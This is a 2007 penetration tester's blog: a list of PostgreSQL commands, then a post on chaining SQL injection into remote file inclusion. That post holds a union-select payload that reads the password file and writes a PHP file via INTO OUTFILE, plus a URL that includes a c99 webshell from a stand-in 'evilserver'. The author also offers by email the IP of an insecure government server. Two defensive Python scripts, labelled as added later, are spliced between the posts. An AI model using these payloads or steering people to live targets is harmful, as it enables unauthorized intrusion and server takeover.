What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems, where I simulate an organized, professional attack against your organization; afterwards, a detailed report summarizing the weaknesses and exploited vectors is delivered. This will help you gain control over your infrastructure's security and maximize your protection.

Tuesday, May 15, 2007

SQL COMMANDS, ALSO USED FOR COMPROMISE

Here is a list of SQL commands and what they do. They are used in some injection methods, and of course in legitimate SQL work too.
On their own they won't exploit anything, but eventually you will come across an exploit that needs them, and they are good to know, for injection or just to better understand how SQL works.

ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database


/Chuks

Thursday, May 10, 2007

ANSWERING THE QUESTIONS ON SQL INJECTION AND BUILDING AN RFI SCRIPT IN-HOUSE

These questions came from the comments and the previous posts, so I will try to explain them as best I can.

The best way to defend against it is to have port 3306 filtered..... (check that server: top government, but one of the most insecure) mail me if you need the IP.

slax ~ # nmap -sS -P0 XXX.XXX.XXX.XXX

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-05-10 12:02 EAT

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
143/tcp closed imap
443/tcp open https
631/tcp closed ipp
3306/tcp open mysql
10000/tcp closed snet-sensor-mgmt


.........and have the latest kernel patch on your box. As long as an RFI bug is in your site, or let's say your CMS, a knowledgeable hacker will still get through, so even a strong password won't be a big deal if he is browsing your server on port 80. The only thing that really helped last year against these kinds of attacks was to have PHP safe_mode ON (secure), but these days there are so many ways of bypassing it, Lol!

This was well shown after the month of PHP bugs, January and February this year, after the release of a lot of POCs to the public by Hardened PHP and other communities.

To all: the best way to secure your box is to know how an intruder will get through, by doing all types of pentest attacks, whether black box or white box penetration testing.
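The scan above is the check the post recommends: confirm from the outside that 3306 is not reachable. The following script is an added example, not the author's tooling; it parses nmap's normal output (a constructed sample in the same layout as the scan above, not the page's host) and flags database ports that are open, using an assumed list of services that should never face the internet. It also flags a host whose ports show as "closed" rather than "filtered", since a closed port means the host itself answered with a RST and nothing is dropping packets in front of it.

```python
import re

# Constructed sample laid out like the scan above (it is not the page's host).
SAMPLE_SCAN = """\
Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-05-10 12:02 EAT

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
143/tcp closed imap
443/tcp open https
631/tcp closed ipp
3306/tcp open mysql
10000/tcp closed snet-sensor-mgmt
"""

# The same host after a packet filter is placed in front of it (constructed).
FILTERED_SCAN = """\
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
3306/tcp filtered mysql
"""

# Services that should only be reachable from the application tier (assumed policy).
INTERNAL_ONLY_PORTS = {3306: "mysql", 5432: "postgresql", 1433: "ms-sql-s"}

# One port line of nmap's normal output: "3306/tcp open mysql"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap(text):
    """Parse nmap's normal (human-readable) output into (port, proto, state, service) tuples."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service = m.groups()
            rows.append((int(port), proto, state, service))
    return rows


def exposed_database_ports(text):
    """Database ports the scan reports as open from the scanner's vantage point."""
    return sorted(port for port, _, state, _ in parse_nmap(text)
                  if state == "open" and port in INTERNAL_ONLY_PORTS)


def unfiltered_host(text):
    """True when any port shows as 'closed': the host answered with a RST itself,
    so no packet filter is dropping traffic in front of it."""
    return any(state == "closed" for _, _, state, _ in parse_nmap(text))


if __name__ == "__main__":
    for name, scan in (("original", SAMPLE_SCAN), ("filtered", FILTERED_SCAN)):
        print(name, "exposed database ports:", exposed_database_ports(scan),
              "| no packet filter in front of host:", unfiltered_host(scan))
```

Run it against a real scan by feeding nmap's output text to exposed_database_ports(); a clean result is an empty list together with unfiltered_host() returning False, which is what the filtered sample shows.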

Something else before I go: SQL injection can help an attacker build up an RFI attack on a server, by trying an injection where he is able to browse files, load_file('etc/password'), and then creating his RFI by crafting an injection like:

www.site.com/vulnerablescripts.php?id=-1+union+select
+',1,2,3,4+from+mysql.user/**/into/**/outfile/**/'/home
/www/public/http/vul.php'/*

So we will have another file on the server named vul.php, which will have a straightforward RFI bug.
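The root cause of the injection above is that the ?id= value is pasted into the SQL text, so the UNION the attacker appends is parsed as part of the query. The script below is an added example written for this post, not the author's code: it builds a constructed in-memory SQLite database with a public articles table and a users table the web page should never expose, then runs the same union-style input through a concatenating lookup and through a parameterized one. The table names, rows and the lookup functions are all assumptions made for the demonstration.

```python
import sqlite3


def build_db():
    """Constructed in-memory database: a public table and one the web app must not expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
        INSERT INTO articles VALUES (1, 'Welcome'), (2, 'News');
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return conn


def lookup_vulnerable(conn, id_param):
    """The ?id= value is concatenated into the statement, as in the vulnerable script above."""
    sql = "SELECT id, title FROM articles WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_param):
    """Validate the type first, then bind the value as a parameter so the database
    engine never parses user-supplied text as SQL."""
    try:
        article_id = int(id_param)
    except ValueError:
        return []  # anything that is not a plain integer is rejected outright
    return conn.execute("SELECT id, title FROM articles WHERE id=?", (article_id,)).fetchall()


if __name__ == "__main__":
    conn = build_db()
    # Constructed input shaped like the page's "-1 union select ..." example.
    payload = "-1 UNION SELECT name, pw_hash FROM users"
    print("normal id, vulnerable:", lookup_vulnerable(conn, "2"))
    print("normal id, safe:      ", lookup_safe(conn, "2"))
    print("union input, vulnerable:", lookup_vulnerable(conn, payload))  # leaks the users row
    print("union input, safe:      ", lookup_safe(conn, payload))        # returns nothing
```

Two caveats for readers mapping this back to the post: the command list in the earlier post is PostgreSQL's command set, while load_file() and INTO OUTFILE are MySQL features; and in MySQL both of those require the FILE privilege, so the database account the web application connects with should never be granted it, and secure_file_priv should restrict where the server may read or write files. Parameterized queries stop the injection itself; least privilege on the database account stops the second step, writing vul.php, even if an injection slips through.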

Then remote include a c99shell, c100, r57 or other privately modded webshells.

www.site.com/vul.php?cmd=http://evilserver/c99.txt

Just a simple one, though there are more complex ones that need a lot of experience.

I tried to explain it with an example.

/Chuks